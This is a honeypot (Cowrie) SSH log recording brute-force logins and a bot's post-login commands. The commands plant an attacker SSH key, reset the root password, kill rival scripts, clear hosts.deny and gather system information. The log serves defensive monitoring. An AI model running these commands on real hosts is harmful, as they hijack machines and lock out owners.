~","sensor":"my-vps","timestamp":"2025-08-26T10:35:40.537104Z","src_ip":"212.227.235.229","session":"cee37927d189"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T10:35:40.626776Z","src_ip":"212.227.235.229","session":"cee37927d189"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:35:40.627666Z","src_ip":"212.227.235.229","session":"cee37927d189"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57190,"dst_ip":"1.2.3.4","dst_port":22,"session":"2214c4c14f2d","protocol":"ssh","message":"New connection: 212.227.235.229:57190 (1.2.3.4:22) [session: 2214c4c14f2d]","sensor":"my-vps","timestamp":"2025-08-26T10:35:40.713510Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:35:40.714396Z","src_ip":"212.227.235.229","session":"2214c4c14f2d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:35:40.801568Z","src_ip":"212.227.235.229","session":"2214c4c14f2d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T10:35:41.192000Z","src_ip":"212.227.235.229","session":"2214c4c14f2d"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"321123","message":"login attempt [oracle/321123] failed","sensor":"my-vps","timestamp":"2025-08-26T10:35:42.241733Z","src_ip":"196.251.86.249","session":"7b6467e06ada"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:35:42.281675Z","src_ip":"212.227.235.229","session":"2214c4c14f2d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39396,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4aa7f27aad3","protocol":"ssh","message":"New connection: 212.227.235.229:39396 (1.2.3.4:22) [session: d4aa7f27aad3]","sensor":"my-vps","timestamp":"2025-08-26T10:35:42.369096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:35:42.370039Z","src_ip":"212.227.235.229","session":"d4aa7f27aad3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:35:42.457249Z","src_ip":"212.227.235.229","session":"d4aa7f27aad3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:35:42.847582Z","src_ip":"212.227.235.229","session":"d4aa7f27aad3"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:35:42.936348Z","src_ip":"212.227.235.229","session":"cee37927d189"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:35:42.937356Z","src_ip":"212.227.235.229","session":"d4aa7f27aad3"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:35:43.792198Z","src_ip":"196.251.86.249","session":"7b6467e06ada"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54540,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8911da9ac95","protocol":"ssh","message":"New connection: 212.227.235.229:54540 (1.2.3.4:22) [session: b8911da9ac95]","sensor":"my-vps","timestamp":"2025-08-26T10:36:35.569594Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:36:35.570482Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:36:35.828943Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.login.success","username":"root","password":"7ujm^YHN","message":"login attempt [root/7ujm^YHN] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:36:37.498990Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:36:38.030290Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T10:36:38.031043Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T10:36:38.032514Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:36:38.294593Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:36:38.911013Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T10:36:38.911678Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T10:36:39.166192Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:36:39.167479Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":42576,"dst_ip":"1.2.3.4","dst_port":22,"session":"52e29c55bcb0","protocol":"ssh","message":"New connection: 196.251.86.249:42576 (1.2.3.4:22) [session: 52e29c55bcb0]","sensor":"my-vps","timestamp":"2025-08-26T10:36:40.083718Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:36:40.719078Z","src_ip":"196.251.86.249","session":"52e29c55bcb0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:36:40.720241Z","src_ip":"196.251.86.249","session":"52e29c55bcb0"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"p@ssw0rd","message":"login attempt [oracle/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T10:36:43.280797Z","src_ip":"196.251.86.249","session":"52e29c55bcb0"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:36:44.791565Z","src_ip":"196.251.86.249","session":"52e29c55bcb0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:36:55.502278Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T10:36:55.502980Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:36:55.762891Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:36:56.290915Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.command.input","input":"echo \"root:5djq1VXFGoyE\"|chpasswd|bash","message":"CMD: echo \"root:5djq1VXFGoyE\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-26T10:36:56.291579Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3972d4bf4fe7a53a318136c769ace9df27e01474845e3f4fd2c2edb6f7d2444b","size":21,"shasum":"3972d4bf4fe7a53a318136c769ace9df27e01474845e3f4fd2c2edb6f7d2444b","duplicate":false,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3972d4bf4fe7a53a318136c769ace9df27e01474845e3f4fd2c2edb6f7d2444b after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:36:56.552835Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:36:57.118425Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-26T10:36:57.119183Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-26T10:36:57.372846Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:36:57.373773Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:36:57.926839Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-26T10:36:57.927652Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:36:58.179329Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:36:58.785172Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-26T10:36:58.785852Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":30,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:36:59.048631Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:36:59.617406Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-26T10:36:59.618225Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-26T10:36:59.618948Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:36:59.881489Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:37:00.409308Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-26T10:37:00.409963Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:37:00.671047Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:37:01.290882Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-26T10:37:01.291682Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":204,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:37:01.546886Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:37:02.085552Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-26T10:37:02.086277Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:37:02.348229Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:37:02.968507Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T10:37:02.969214Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:37:03.226404Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:37:03.793024Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-26T10:37:03.793703Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
